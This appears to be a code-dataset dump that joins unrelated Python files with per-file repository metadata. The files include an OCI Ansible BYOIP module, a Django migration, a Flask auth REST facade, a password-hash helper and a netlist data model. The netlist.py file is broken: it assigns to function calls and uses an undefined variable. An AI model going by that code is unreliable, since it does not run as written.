time_created:
description:
- The date and time the Byoip Range was created, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
time_validated:
description:
- The date and time the Byoip Range was validated, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
time_advertised:
description:
- The date and time the Byoip Range was advertised, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
time_withdrawn:
description:
- The date and time the Byoip Range was withdrawn, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
validation_token:
description:
- This is an internally generated ASCII string that the user will then use as part of the validation process. Specifically, they will need to
add the token string generated by the service to their Internet Registry record.
returned: on success
type: string
sample: validation_token_example
sample: {
"cidr_block": "cidr_block_example",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"defined_tags": {'Operations': {'CostCenter': 'US'}},
"display_name": "display_name_example",
"freeform_tags": {'Department': 'Finance'},
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"lifecycle_details": "CREATING",
"lifecycle_state": "INACTIVE",
"time_created": "2016-08-25T21:10:29.600Z",
"time_validated": "2016-08-25T21:10:29.600Z",
"time_advertised": "2016-08-25T21:10:29.600Z",
"time_withdrawn": "2016-08-25T21:10:29.600Z",
"validation_token": "validation_token_example"
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIActionsHelperBase,
get_custom_class,
)
try:
from oci.work_requests import WorkRequestClient
from oci.core import VirtualNetworkClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class ByoipRangeActionsHelperGen(OCIActionsHelperBase):
"""
Supported actions:
advertise
validate
withdraw
"""
def __init__(self, *args, **kwargs):
super(ByoipRangeActionsHelperGen, self).__init__(*args, **kwargs)
self.work_request_client = WorkRequestClient(
self.client._config, **self.client._kwargs
)
@staticmethod
def get_module_resource_id_param():
return "byoip_range_id"
def get_module_resource_id(self):
return self.module.params.get("byoip_range_id")
def get_get_fn(self):
return self.client.get_byoip_range
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_byoip_range,
byoip_range_id=self.module.params.get("byoip_range_id"),
)
def advertise(self):
return oci_wait_utils.call_and_wait(
call_fn=self.client.advertise_byoip_range,
call_fn_args=(),
call_fn_kwargs=dict(
byoip_range_id=self.module.params.get("byoip_range_id"),
),
waiter_type=oci_wait_utils.NONE_WAITER_KEY,
operation="{0}_{1}".format(
self.module.params.get("action").upper(),
oci_common_utils.ACTION_OPERATION_KEY,
),
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_action_desired_states(
self.module.params.get("action")
),
)
def validate(self):
return oci_wait_utils.call_and_wait(
call_fn=self.client.validate_byoip_range,
call_fn_args=(),
call_fn_kwargs=dict(
byoip_range_id=self.module.params.get("byoip_range_id"),
),
waiter_type=oci_wait_utils.WORK_REQUEST_WAITER_KEY,
operation="{0}_{1}".format(
self.module.params.get("action").upper(),
oci_common_utils.ACTION_OPERATION_KEY,
),
waiter_client=self.work_request_client,
resource_helper=self,
wait_for_states=oci_common_utils.get_work_request_completed_states(),
)
def withdraw(self):
return oci_wait_utils.call_and_wait(
call_fn=self.client.withdraw_byoip_range,
call_fn_args=(),
call_fn_kwargs=dict(
byoip_range_id=self.module.params.get("byoip_range_id"),
),
waiter_type=oci_wait_utils.NONE_WAITER_KEY,
operation="{0}_{1}".format(
self.module.params.get("action").upper(),
oci_common_utils.ACTION_OPERATION_KEY,
),
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_action_desired_states(
self.module.params.get("action")
),
)
ByoipRangeActionsHelperCustom = get_custom_class("ByoipRangeActionsHelperCustom")
class ResourceHelper(ByoipRangeActionsHelperCustom, ByoipRangeActionsHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec(
supports_create=False, supports_wait=True
)
module_args.update(
dict(
byoip_range_id=dict(aliases=["id"], type="str", required=True),
action=dict(
type="str", required=True, choices=["advertise", "validate", "withdraw"]
),
)
)
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_helper = ResourceHelper(
module=module,
resource_type="byoip_range",
service_client_class=VirtualNetworkClient,
namespace="core",
)
result = resource_helper.perform_action(module.params.get("action"))
module.exit_json(**result)
if __name__ == "__main__":
main()
| 36.076453 | 157 | 0.62838 | 1,341 | 11,797 | 5.316182 | 0.219239 | 0.057512 | 0.025249 | 0.04124 | 0.547903 | 0.495161 | 0.420676 | 0.403984 | 0.346332 | 0.323327 | 0 | 0.033038 | 0.281597 | 11,797 | 326 | 158 | 36.187117 | 0.808142 | 0.037382 | 0 | 0.386282 | 0 | 0.028881 | 0.613496 | 0.080728 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032491 | false | 0.00361 | 0.025271 | 0.025271 | 0.090253 | 0.00361 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e7af734f787f539bb408cb7fe22f61fdf7e00a2 | 420 | py | Python | Task/XML-XPath/Python/xml-xpath-3.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 5 | 2021-01-29T20:08:05.000Z | 2022-03-22T06:16:05.000Z | Task/XML-XPath/Python/xml-xpath-3.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | null | null | null | Task/XML-XPath/Python/xml-xpath-3.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2021-04-13T04:19:31.000Z | 2021-04-13T04:19:31.000Z | from lxml import etree
xml = open('inventory.xml').read()
doc = etree.fromstring(xml)
doc = etree.parse('inventory.xml') # or load it directly
# Return first item
item1 = doc.xpath("//section[1]/item[1]")
# Print each price
for p in doc.xpath("//price"):
print "{0:0.2f}".format(float(p.text)) # could raise exception on missing text or invalid float() conversion
names = doc.xpath("//name") # list of names
| 26.25 | 113 | 0.683333 | 66 | 420 | 4.348485 | 0.666667 | 0.083624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016901 | 0.154762 | 420 | 15 | 114 | 28 | 0.791549 | 0.32381 | 0 | 0 | 0 | 0 | 0.241007 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.125 | null | null | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e81c4c89fc725598694857a973e6932f60c90ef | 571 | py | Python | profile/migrations/0003_globalalert.py | ritstudentgovernment/PawPrints | 6f52d721d4c367a8524f49881e62a162a81469b4 | [
"Apache-2.0"
] | 15 | 2017-04-03T14:01:44.000Z | 2022-03-18T06:38:56.000Z | profile/migrations/0003_globalalert.py | ritstudentgovernment/PawPrints | 6f52d721d4c367a8524f49881e62a162a81469b4 | [
"Apache-2.0"
] | 87 | 2016-10-13T01:53:38.000Z | 2022-02-11T03:39:55.000Z | profile/migrations/0003_globalalert.py | ritstudentgovernment/PawPrints | 6f52d721d4c367a8524f49881e62a162a81469b4 | [
"Apache-2.0"
] | 8 | 2017-10-19T18:30:48.000Z | 2021-04-03T02:26:01.000Z | # Generated by Django 2.1.3 on 2019-02-12 19:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('profile', '0002_auto_20180126_1900'),
]
operations = [
migrations.CreateModel(
name='GlobalAlert',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('active', models.BooleanField(default=True)),
('content', models.TextField()),
],
),
]
| 25.954545 | 114 | 0.574431 | 56 | 571 | 5.75 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.294221 | 571 | 21 | 115 | 27.190476 | 0.722084 | 0.078809 | 0 | 0 | 1 | 0 | 0.110687 | 0.043893 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e89cbffc4a91ed54b3053c35f0260697741a47e | 2,618 | py | Python | git_diff_ssr2_osm_wrapper.py | obtitus/ssr2_to_osm | 3674b3d78666e79306af237630782d6892986853 | [
"WTFPL"
] | 1 | 2018-04-02T13:04:43.000Z | 2018-04-02T13:04:43.000Z | git_diff_ssr2_osm_wrapper.py | obtitus/ssr2_to_osm | 3674b3d78666e79306af237630782d6892986853 | [
"WTFPL"
] | null | null | null | git_diff_ssr2_osm_wrapper.py | obtitus/ssr2_to_osm | 3674b3d78666e79306af237630782d6892986853 | [
"WTFPL"
] | null | null | null | #/usr/bin/env python
import sys
import logging
logger = logging.getLogger('utility_to_osm.ssr2.git_diff')
import utility_to_osm.file_util as file_util
from osmapis_stedsnr import OSMstedsnr
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
# diff is called by git with 7 parameters:
# path old-file old-hex old-mode new-file new-hex new-mode
new_file, old_file = sys.argv[1], sys.argv[2]
logger.info('Reading %s', old_file)
content = file_util.read_file(old_file)
old_osm = OSMstedsnr.from_xml(content)
logger.info('Reading %s', new_file)
content = file_util.read_file(new_file)
new_osm = OSMstedsnr.from_xml(content)
print('\n=== Missing stedsnr ===\n')
old_stedsnr = sorted(old_osm.stedsnr.keys())
new_stedsnr = sorted(new_osm.stedsnr.keys())
for key in old_stedsnr:
if key not in new_stedsnr:
print('Diff, %s missing in old' % key)
print(old_osm.stedsnr[key][0])
for key in new_stedsnr:
if key not in old_stedsnr:
print('Diff, %s missing in new' % key)
print(new_osm.stedsnr[key][0])
print('\n=== Tagging differences ===\n')
stedsnr = set(old_stedsnr).intersection(new_stedsnr)
for key in stedsnr:
old = old_osm.stedsnr[key][0]
new = new_osm.stedsnr[key][0]
limit_distance = 1e-5 # FIXME: resonable?
old_lat, old_lon = float(old.attribs['lat']), float(old.attribs['lon'])
new_lat, new_lon = float(new.attribs['lat']), float(new.attribs['lon'])
if abs(old_lat - new_lat) > limit_distance or abs(old_lon - new_lon) > limit_distance:
print('Diff in position %s old [%s, %s] != new [%s, %s]' % (key, old_lat, old_lon, new_lat, new_lon))
for tag_key in old.tags:
if tag_key not in new.tags:
print('Diff %s, %s missing in new:' % (key, tag_key))
print(' old[%s] = %s\n' % (tag_key, old.tags[tag_key]))
for tag_key in new.tags:
if tag_key not in old.tags:
print('Diff %s, %s missing in old:' % (key, tag_key))
print(' new[%s] = %s\n' % (tag_key, new.tags[tag_key]))
common_tags = set(old.tags.keys()).intersection(new.tags.keys())
for tag_key in common_tags:
if tag_key in ('ssr:date', ):
continue # don't care
o, n = new.tags[tag_key], old.tags[tag_key]
if o != n:
print('Diff %s:\n old[%s] = %s\n new[%s] = %s\n' % (key, tag_key, o, tag_key, n))
| 37.4 | 113 | 0.590145 | 395 | 2,618 | 3.716456 | 0.21519 | 0.065395 | 0.03406 | 0.038147 | 0.305177 | 0.153951 | 0.032698 | 0 | 0 | 0 | 0 | 0.005249 | 0.272345 | 2,618 | 69 | 114 | 37.942029 | 0.765354 | 0.055768 | 0 | 0 | 0 | 0.02 | 0.142683 | 0.01135 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0 | false | 0 | 0.08 | 0 | 0.08 | 0.24 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e8b170787a661b47b55daff06b3f3213a1a7b64 | 389 | py | Python | test-data/mkpasswd.py | colorshifter/lsd-members | 2b8516eb5ef890e7f0dba456246e0448f2150c2c | [
"MIT"
] | 1 | 2016-08-22T20:43:06.000Z | 2016-08-22T20:43:06.000Z | test-data/mkpasswd.py | colorshifter/lsd-members | 2b8516eb5ef890e7f0dba456246e0448f2150c2c | [
"MIT"
] | 2 | 2017-12-07T08:55:18.000Z | 2018-09-10T12:02:48.000Z | test-data/mkpasswd.py | colorshifter/lsd-members | 2b8516eb5ef890e7f0dba456246e0448f2150c2c | [
"MIT"
] | 2 | 2016-11-21T11:06:20.000Z | 2018-06-14T07:28:31.000Z | #!/usr/bin/env python3
import uuid
from passlib.hash import pbkdf2_sha512
password = input('Enter password: ')
password_parts = pbkdf2_sha512.encrypt(password, salt_size=32).split('$')
password = password_parts[4]
salt = password_parts[3]
def convert_b64(input):
return input.replace('.', '+') + '='
print('Password: ' + convert_b64(password))
print('Salt: ' + convert_b64(salt))
| 20.473684 | 73 | 0.717224 | 51 | 389 | 5.294118 | 0.54902 | 0.144444 | 0.155556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.120823 | 389 | 18 | 74 | 21.611111 | 0.733918 | 0.053985 | 0 | 0 | 0 | 0 | 0.098361 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.6 | 0.2 | 0.1 | 0.4 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1e900a65b6846f2a1190992044167004788fc442 | 6,531 | py | Python | netlist.py | phdbreak/netlist_parser.py | 579a10592442ed27179ea7c56d33b6cbd72230d0 | [
"Apache-2.0"
] | 11 | 2019-05-18T08:22:29.000Z | 2022-01-23T01:05:39.000Z | netlist.py | phdbreak/netlist_parser.py | 579a10592442ed27179ea7c56d33b6cbd72230d0 | [
"Apache-2.0"
] | null | null | null | netlist.py | phdbreak/netlist_parser.py | 579a10592442ed27179ea7c56d33b6cbd72230d0 | [
"Apache-2.0"
] | 3 | 2017-10-26T08:03:34.000Z | 2018-04-09T21:30:04.000Z |
# Parent tree
# design
# |---> module
# |-----> port/wire
# |-----> instance
# |-----> pin
class design_t:
def __init__(self):
self.modules = dict()
def add_module(self, module_name):
if (module_name in self.modules.keys()):
print 'Error: module (%s) already exisits' % module_name
return None
m = module_t(module_name)
self.modules(m.name) = m
return m
class module_t:
def __init__(self, name):
self.name = name
self.ports = dict()
self.ls_port = list() # port in order
self.wires = dict()
self.instances = dict()
self.params = dict()
self.is_hierarchical = True
self.full_name = self.name
def add_port(self, port_name, direction):
if (port_name in self.ports.keys()):
print 'Error: port (%s) in module (%s) already exists' % (port_name, self.full_name)
return None
p = port_t(port_name, self, direction)
self.ports(p.name) = p
self.ls_port.append(p)
return p
def add_wire(self, wire_name):
if (wire_name in self.wires.keys()):
print 'Error: wire (%s) in module (%s) already exists' % (wire_name, self.full_name)
return None
w = wire_t(wire_name, self)
self.wires(w.name) = w
return w
def add_instance(self, instance_name):
if (instance_name in self.instances.keys()):
print 'Error: instance (%s) in module (%s) already exists' % (instance_name, self.full_name)
return None
n = instance_t(instance_name, self)
self.instances(n.name) = n
return n
def add_param(self, param, default_value):
if (param in self.params.keys()):
print 'Error: param (%s) in module (%s) already exists' % (param, self.full_name)
return 0
self.params(param) = default_value
return 1
# def __eq__(self, other):
# equal = True
# if not (self.name == other.name):
# equal = False
# if not __eq_dict__(self.ports, other.ports):
# equal = False
# if not __eq_dict__(self.instances, other.instances):
# equal = False
# if not __eq_dict__(self.wires, other.wires):
# equal = False
#
# if not equal:
# print 'Error: modules (%s != %s) donot match' % (self, other)
#
# return equal
class instance_t:
'instance of module'
def __init__(self, name, parent_module):
self.name = name
self.parent_module = parent_module
self.pins = dict()
self.master_module = None
self.params = dict()
self.full_name = '%s.%s' % (self.parent_module.name, self.name)
for master_port in self.parent_module.ports.values():
p = pin_t(master_port, self)
self.pins[p.name] = p
def connect_pin(self, pin_name, connect_name):
# find connect
m = self.parent_module
if (connect_name in m.ports.keys()):
connect = m.ports(connect_name)
elif (connect_name in m.wires.keys()):
connect = m.wires(connect_name)
else:
print 'Error: cannot find connect (%s) in module (%s) for instance (%s)' % (connect_name, m.name, self.name)
self.pins[pin_name].ls_connect.append(connect)
connect.ls_connect.append(self)
def add_param(self, param, value):
assert param in self.parent_module.params.keys(), 'Error: param (%s) doesnot exist in module (%s)' % (param, self.parent_module.name)
self.params(param) = value
# def __eq__(self, other):
# equal = True
# if (not self.name == other.name) or (not self.parent_module.name == other.parent_module.name) or (not self.master_module.name == other.master_module.name):
# equal = False
# if not __eq_dict__(self.pins, other.pins):
# equal = False
#
# if not equal:
# print 'Error: instances (%s != %s) donot match' % (self, other)
#
# return equal
class net_t:
'basic class for wire/port/pin'
def __init__(self, name):
self.name = name
self.ls_connect = list()
class wire_t(net_t):
'wire in module, connect to internal pin'
def __init__(self, name, parent_module):
net_t.__init__(self, name)
self.parent_module = parent_module
self.ls_fanin = list()
self.ls_fanout = list()
class port_t(net_t):
'port of module, connect to internal pin'
def __init__(self, name, parent_module, direction):
net_t.__init__(self, name)
self.parent_module = parent_module
assert direction in 'input output bidirection', direction
self.direction = direction
self.full_name = '%s.%s' % (self.parent_module.name, self.name)
# def __eq__(self, other):
# if (not self.name == other.name) or (not self.parent_module.name == other.parent_module.name) or (not self.direction == other.direction):
# print 'Error: ports (%s != %s) donot match' % (self, other)
# return False
# else:
# return True
class pin_t(port_t):
'pin of instance, connect to external port/wire'
def __init__(self, master_port, parent_instance):
net_t.__init__(self, master_port.name)
self.master_port = master_port
self.parent_instance = parent_instance
self.full_name = '%s.%s.%s' % (self.parent_instance.parent_module.name, self.parent_instance.name, self.name)
# def __eq__(self, other):
# if (not self.name == other.name) or (not self.master_port.name == other.master_port.name) or (not self.parent_instance.name == other.parent_instance.name):
# print 'Error: pins (%s != %s) donot match' % (self, other)
# return False
# else:
# return true
################################################################
# compare 2 design/module
################################################################
def __eq_dict__(dict1, dict2):
if (len(set(dict1.keys()) ^ set(dict2.keys())) > 0):
return False
for key in dict1.keys():
if not (dict1[key] == dict2[port_name]):
return False
return True
| 34.739362 | 166 | 0.562089 | 817 | 6,531 | 4.264382 | 0.107711 | 0.052813 | 0.050517 | 0.025832 | 0.376579 | 0.344432 | 0.287887 | 0.244834 | 0.211538 | 0.190299 | 0 | 0.002418 | 0.303476 | 6,531 | 187 | 167 | 34.925134 | 0.763465 | 0.262134 | 0 | 0.205607 | 0 | 0 | 0.122559 | 0 | 0 | 0 | 0 | 0 | 0.018692 | 0 | null | null | 0 | 0 | null | null | 0.056075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e93ac91aee06f027f96435be13dad3be14c5158 | 3,128 | py | Python | tests/lib/bes/cli/test_cli.py | reconstruir/bes | 82ff54b2dadcaef6849d7de424787f1dedace85c | [
"Apache-2.0"
] | null | null | null | tests/lib/bes/cli/test_cli.py | reconstruir/bes | 82ff54b2dadcaef6849d7de424787f1dedace85c | [
"Apache-2.0"
] | null | null | null | tests/lib/bes/cli/test_cli.py | reconstruir/bes | 82ff54b2dadcaef6849d7de424787f1dedace85c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
from collections import namedtuple
import os.path as path
from bes.testing.program_unit_test import program_unit_test
from bes.fs.file_util import file_util
from bes.system.host import host
class test_cli(program_unit_test):
# if host.is_unix():
# _program = program_unit_test.file_path(__file__, 'fake_program.py')
# elif host.is_windows():
# _program = program_unit_test.file_path(__file__, 'fake_program.bat')
# else:
# host.raise_unsupported_system()
def test_cli(self):
kitchen_program_content = '''\
#!/usr/bin/env python
from kitchen_cli import kitchen_cli
if __name__ == '__main__':
kitchen_cli.run()
'''
knife_cli_args_content = '''\
class knife_cli_args(object):
def knife_add_args(self, subparser):
p = subparser.add_parser('cut', help = 'Cut something.')
p.add_argument('what', action = 'store', default = None, help = 'What to cut []')
def _command_knife(self, command, *args, **kargs):
func = getattr(self, command)
return func(*args, **kargs)
@classmethod
def cut(clazz, what):
print('cut({})'.format(what))
return 0
'''
oven_cli_args_content = '''\
class oven_cli_args(object):
def oven_add_args(self, subparser):
p = subparser.add_parser('bake', help = 'Bake something.')
p.add_argument('what', action = 'store', default = None, help = 'What to bake []')
def _command_oven(self, command, *args, **kargs):
func = getattr(self, command)
return func(*args, **kargs)
@classmethod
def bake(clazz, what):
print('bake({})'.format(what))
return 0
'''
kitchen_cli_content = '''\
from bes.cli.cli_command import cli_command
from bes.cli.cli import cli
from knife_cli_args import knife_cli_args
from oven_cli_args import oven_cli_args
class kitchen_cli(cli):
def __init__(self):
super(kitchen_cli, self).__init__('kitchen')
#@abstractmethod
def command_list(self):
return []
#@abstractmethod
def command_group_list(self):
return [
cli_command('knife', 'knife_add_args', 'Knife', knife_cli_args),
cli_command('oven', 'oven_add_args', 'Oven', oven_cli_args),
]
@classmethod
def run(clazz):
raise SystemExit(kitchen_cli().main())
'''
tmp = self.make_temp_dir()
kitchen_program = file_util.save(path.join(tmp, 'kitchen.py'), content = kitchen_program_content)
file_util.save(path.join(tmp, 'knife_cli_args.py'), content = knife_cli_args_content)
file_util.save(path.join(tmp, 'oven_cli_args.py'), content = oven_cli_args_content)
file_util.save(path.join(tmp, 'kitchen_cli.py'), content = kitchen_cli_content)
rv = self.run_program(kitchen_program, [ 'knife', 'cut', 'bread' ])
self.assertEqual( 0, rv.exit_code )
self.assertEqual( 'cut(bread)', rv.output.strip() )
rv = self.run_program(kitchen_program, [ 'oven', 'bake', 'cheesecake' ])
self.assertEqual( 0, rv.exit_code )
self.assertEqual( 'bake(cheesecake)', rv.output.strip() )
if __name__ == '__main__':
program_unit_test.main()
| 28.962963 | 101 | 0.693734 | 438 | 3,128 | 4.63242 | 0.23516 | 0.0483 | 0.0414 | 0.031543 | 0.35239 | 0.35239 | 0.322819 | 0.289798 | 0.210941 | 0.130113 | 0 | 0.002671 | 0.162084 | 3,128 | 107 | 102 | 29.233645 | 0.771461 | 0.108376 | 0 | 0.260274 | 0 | 0.027397 | 0.605538 | 0.102481 | 0 | 0 | 0 | 0 | 0.054795 | 1 | 0.013699 | false | 0 | 0.136986 | 0 | 0.246575 | 0.027397 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e976a098cfe8028b00f3a845ba60be8b5f9da1e | 5,279 | py | Python | src/components/auth-server/lib/presentation/restapi.py | ars1004/practica-dms-2019-2020 | c6ff5ca05faf7e785f85b12f4fa66015f5a7a507 | [
"MIT"
] | null | null | null | src/components/auth-server/lib/presentation/restapi.py | ars1004/practica-dms-2019-2020 | c6ff5ca05faf7e785f85b12f4fa66015f5a7a507 | [
"MIT"
] | null | null | null | src/components/auth-server/lib/presentation/restapi.py | ars1004/practica-dms-2019-2020 | c6ff5ca05faf7e785f85b12f4fa66015f5a7a507 | [
"MIT"
] | 9 | 2019-10-08T19:07:45.000Z | 2021-11-02T19:19:53.000Z | from flask import Flask, escape, request, abort
from lib.data.db.schema.manager import Manager as SchemaManager
from lib.data.db.schema.recordsets.users import Users
from lib.data.db.schema.recordsets.userscores import UserScores
from lib.data.db.schema.recordsets.usersessions import UserSessions
import json
class RestApi():
""" REST API facade.
---
This class is a facade with the operations provided through the REST API.
"""
def __init__(self):
SchemaManager.create_schema()
def status(self, request):
""" Status handler.
---
Always returns a tuple with the 200 status code and an "OK" message.
"""
return (200, 'OK')
def create_user(self, request):
""" User creation handler.
---
Performs the user creation operation, generating a new user in the database.
Parameters:
- request: The HTTP request received in the REST endpoint.
Returns:
A tuple with the following values:
- (200, 'OK') on a successful creation.
- (500, 'Server error') on a failed creation.
"""
username = request.form['username']
password = request.form['password']
db_session = SchemaManager.session()
users_rs = Users(db_session)
try:
new_user = users_rs.create(username, password)
if (new_user is None):
raise
except:
return (500, 'Server error')
return (200, 'OK')
def login_user(self, request):
""" User login handler.
---
Performs the user login operation, generating a new token to be used in future operations.
Parameters:
- request: The HTTP request received in the REST endpoint.
Returns:
A tuple with the following values:
- (200, authentication token) on a successful login.
- (401, 'Unauthorized') on a failed login.
"""
username = request.form['username']
password = request.form['password']
db_session = SchemaManager.session()
users_rs = Users(db_session)
if (not users_rs.user_is_valid(username, password)):
return (401, 'Unauthorized')
user_sessions_rs = UserSessions(db_session)
user_session = user_sessions_rs.create(username)
return (200, user_session.token)
def check_token(self, request):
""" Token checking handler.
---
Checks the validity of an authentication token.
Parameters:
- request: The HTTP request received in the REST endpoint.
Returns:
A tuple with the following values:
- (200, 'OK') when the provided token is valid.
- (401, 'Unauthorized') for an incorrect token.
"""
token = request.form['token']
db_session = SchemaManager.session()
user_sessions_rs = UserSessions(db_session)
if (not user_sessions_rs.token_is_valid(token)):
return (401, 'Unauthorized')
return (200, 'OK')
def list_scores(self, request):
""" Scores listing handler.
---
Retrieves a list of scores.
Parameters:
- request: The HTTP request received in the REST endpoint.
Returns:
A tuple with the following values:
- (200, list of score records) when the list was successfully retrieved.
"""
db_session = SchemaManager.session()
user_scores_rs = UserScores(db_session)
user_score_records = user_scores_rs.get_all_user_scores()
out = []
for user_score_record in user_score_records:
out.append({
'username': user_score_record.username,
'games_won': user_score_record.games_won,
'games_lost': user_score_record.games_lost,
'score': user_score_record.score
})
return (200, json.dumps(out))
def add_score(self, request):
""" Scores increasing handler.
---
Increments (or decrements) the score of a user
Parameters:
- request: The HTTP request received in the REST endpoint.
Returns:
A tuple with the following values:
- (200, 'OK') when the score was successfully updated.
- (401, 'Unauthorized') when the user cannot update the scores.
"""
token = request.form['token']
games_won_delta = int(request.form['games_won']) if 'games_won' in request.form else None
games_lost_delta = int(request.form['games_lost']) if 'games_lost' in request.form else None
score_delta = int(request.form['score']) if 'score' in request.form else None
db_session = SchemaManager.session()
user_sessions_rs = UserSessions(db_session)
if (not user_sessions_rs.token_is_valid(token)):
return (401, 'Unauthorized')
user_session = user_sessions_rs.get_session(token)
user_scores_rs = UserScores(db_session)
user_scores_rs.add_user_score(user_session.username, games_won_delta, games_lost_delta, score_delta)
return (200, 'OK')
| 35.42953 | 108 | 0.610343 | 612 | 5,279 | 5.104575 | 0.205882 | 0.042254 | 0.03137 | 0.03265 | 0.435659 | 0.362356 | 0.323303 | 0.300896 | 0.300896 | 0.300896 | 0 | 0.016287 | 0.302141 | 5,279 | 148 | 109 | 35.668919 | 0.831705 | 0.336048 | 0 | 0.409091 | 0 | 0 | 0.058037 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106061 | false | 0.060606 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1e982d7567ee821b8267f9f3943560d8280e85a8 | 1,604 | py | Python | Sprint Challenge/acme_report.py | dylan0stewart/DS-Unit-3-Sprint-1-Software-Engineering | d40ad035b1d10df0068cf5c5106a586c569804e2 | [
"MIT"
] | null | null | null | Sprint Challenge/acme_report.py | dylan0stewart/DS-Unit-3-Sprint-1-Software-Engineering | d40ad035b1d10df0068cf5c5106a586c569804e2 | [
"MIT"
] | null | null | null | Sprint Challenge/acme_report.py | dylan0stewart/DS-Unit-3-Sprint-1-Software-Engineering | d40ad035b1d10df0068cf5c5106a586c569804e2 | [
"MIT"
] | null | null | null | """
Class Report: Part 4 of the Sprint Challenge
- Generate random Product list, and get an Inventory Report on that list
"""
from random import randint, sample, uniform
from acme import Product
ADJECTIVES = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']
